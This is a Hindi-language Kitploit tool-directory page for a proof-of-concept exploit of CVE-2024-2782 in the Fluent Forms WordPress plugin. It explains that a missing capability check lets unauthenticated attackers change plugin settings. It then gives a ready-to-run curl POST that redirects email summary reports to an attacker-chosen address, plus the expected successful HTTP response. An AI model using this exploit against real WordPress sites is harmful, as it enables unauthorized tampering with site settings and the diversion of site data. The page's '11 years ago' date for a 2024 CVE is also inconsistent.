Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-2782-PoC — CVE-2024-2782 प्रूफ-ऑफ-कॉन्सेप्ट | Kitploit
उपकरण/GitHubGitHub/whale93/cve-2024-2782-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubwhale93/cve-2024-2782-poc

CVE-2024-2782-PoC

CVE-2024-2782 प्रूफ-ऑफ-कॉन्सेप्ट

रिपॉजिटरी देखें
11 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-2782-PoC

CVE-2024-2782 प्रूफ-ऑफ-कॉन्सेप्ट

वर्डप्रेस के लिए क्विज़, सर्वे और ड्रैग एंड ड्रॉप WP फॉर्म बिल्डर प्लगइन के लिए फ्लुएंट फॉर्म्स द्वारा कॉन्टैक्ट फॉर्म प्लगइन, /wp-json/fluentform/v1/global-settings REST API एंडपॉइंट पर क्षमता जांच की कमी के कारण डेटा में अनधिकृत संशोधन की चपेट में है, सभी संस्करणों में 5.1.16 तक और सहित। यह अप्रमाणित हमलावरों के लिए प्लगइन की सभी सेटिंग्स को संशोधित करना संभव बनाता है।

पूर्वापेक्षाएँ

  • वर्डप्रेस साइट जिसमें कॉन्टैक्ट फॉर्म – फ्लुएंट फॉर्म्स ≤ 5.1.16 सक्रिय हो।
  • हमलावर साइट के REST API तक पहुँच सकता है (कोई प्रमाणीकरण आवश्यक नहीं)।

एक्सप्लॉइट कमांड

root@kitploit:~
curl -i -X POST "http://TARGET/wp-json/fluentform/v1/global-settings"
  -H "Content-Type: application/json"
  -d '{
  "key": "emailSummarySettings",
  "email_report": "{"send_to_type":"custom","custom_recipients":"[email protected]"}"
}'

अपेक्षित प्रतिक्रिया

root@kitploit:~
HTTP/1.1 200 OK
Date: Thu, 31 Jul 2025 13:11:49 GMT
Server: Apache/2.4.62 (Debian)
X-Powered-By: PHP/8.3.11
X-Robots-Tag: noindex
Link: <http://target:9090/wp-json/>; rel="https://api.w.org/"
X-Content-Type-Options: nosniff
Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link
Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private
Allow: POST
Content-Length: 4
Content-Type: application/json; charset=UTF-8

true

स्क्रीनशॉट चित्र

वर्डप्रेस डेटाबेस में परिवर्तन सत्यापित करें चित्र

टूल डाउनलोड करें